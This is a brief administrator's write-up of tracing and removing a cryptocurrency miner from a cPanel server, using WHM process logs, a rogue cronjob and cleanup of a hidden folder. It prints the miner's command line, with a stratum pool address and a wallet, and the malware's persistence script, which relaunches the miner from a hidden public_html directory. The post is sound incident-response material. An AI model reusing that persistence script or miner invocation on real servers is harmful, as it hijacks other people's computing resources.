Recently one of server under my control infected with mining software. It cause unnecessary load and waste of server resource.

Since the server is using Cpanel, I must use WHM to track down the source. I check WHM ‘Process Manager’ and ‘Daily process log’ and found something similar like :

impxxxx impxxxxketing.com 98.5 -bash -a cryptonight -o stratum+tcp://xx.xx.xx.xx:14444 -u 4AmprS3UsK28LE9pHnt9TXDZygXoVtnQ6eFkD5ghP7TwPZ7tKkhQJn1Z3SUCbmw7xcA8F6pnQBpEzfQ2BGdTXo6BEs7MFHZ -p x

Using ‘Process Manager’ to kill the pid who is running the process.

I have check in the user Cpanel and found strange cronjob point to strange path eg :

/home/impxxxx/public_html/nrxxxxment/includes/.qts/upd

So I read the content of the file using cat command:

[[email protected] ~]# cat /home/impxxxx/public_html/nrxxxxment/includes/.qts/upd
#!/bin/sh
if test -r /home/impxxxx/public_html/nrxxxxment/includes/.qts/bash.pid; then
pid=$(cat /home/impxxxx/public_html/nrxxxxment/includes/.qts/bash.pid)
if $(kill -CHLD $pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd /home/impxxxx/public_html/nrxxxxment/includes/.qts
./r &>/dev/null

Go to the folder contents and see what is inside the folder:

[[email protected] ~]# cd /home/impxxxx/public_html/nrxxxxment/includes/.qts/
[[email protected] .qts]# ls
a bash.pid cron.d dir.dir f g m p r s t upd x

The existence of bash.pid confirm that the mining come from that path.

Delete the folder and delete the cronjob so the mining stop.

[[email protected] .qts]# cd ..
[[email protected] includes]# rm -rfv .qts
removed ‘.qts/f’
removed ‘.qts/x’
removed ‘.qts/cron.d’
removed ‘.qts/t’
removed ‘.qts/s’
removed ‘.qts/p’
removed ‘.qts/dir.dir’
removed ‘.qts/bash.pid’
removed ‘.qts/a’
removed ‘.qts/upd’
removed ‘.qts/g’
removed ‘.qts/m’
removed ‘.qts/r’
removed directory: ‘.qts’